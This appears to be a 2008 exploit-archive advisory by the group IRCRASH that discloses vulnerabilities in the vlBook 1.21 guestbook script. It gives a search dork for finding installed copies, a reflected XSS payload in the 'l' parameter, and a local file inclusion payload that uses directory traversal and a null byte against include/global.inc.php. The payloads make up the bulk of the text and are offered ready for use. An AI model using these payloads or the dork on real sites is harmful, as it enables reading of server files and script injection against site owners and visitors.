[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : vlBook 1.21 (XSS/LFI) Multiple Remote Vulnerabilities
# Published : 2008-05-01
# Author : IRCRASH
# Previous Title : ActualAnalyzer Lite (free) 2.78 Local File Inclusion Vulnerability
# Next Title : AJ HYIP ACME (topic_detail.php id) Remote SQL Injection Vulnerability
#####################################################################################
#### vlBook 1.21 (ALL VERSION) ####
#### Multiple Remote Vulnerabilities (LFI/XSS) ####
#####################################################################################
# #
#AUTHOR : IRCRASH (Dr.Crash Or Khashayar Fereidani) #
#Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr
#####################################################################################
# #
#Script Download : http://home.vlab.info/vlbook_1.21.zip #
# #
#DORK : "Powered by vlBook 1.21" #
# #
#####################################################################################
# < XSS > #
#XSS Address : http://example/?l=" <script>alert('xss')</script> #
# #
#####################################################################################
# < LFI > #
#LFI Address : http://example/include/global.inc.php?l=../../../[FILE NAME]%00 #
# #
#####################################################################################
# Site : Http://IRCRASH.COM #
################################ TNX GOD ############################################
# www.Syue.com [2008-05-01]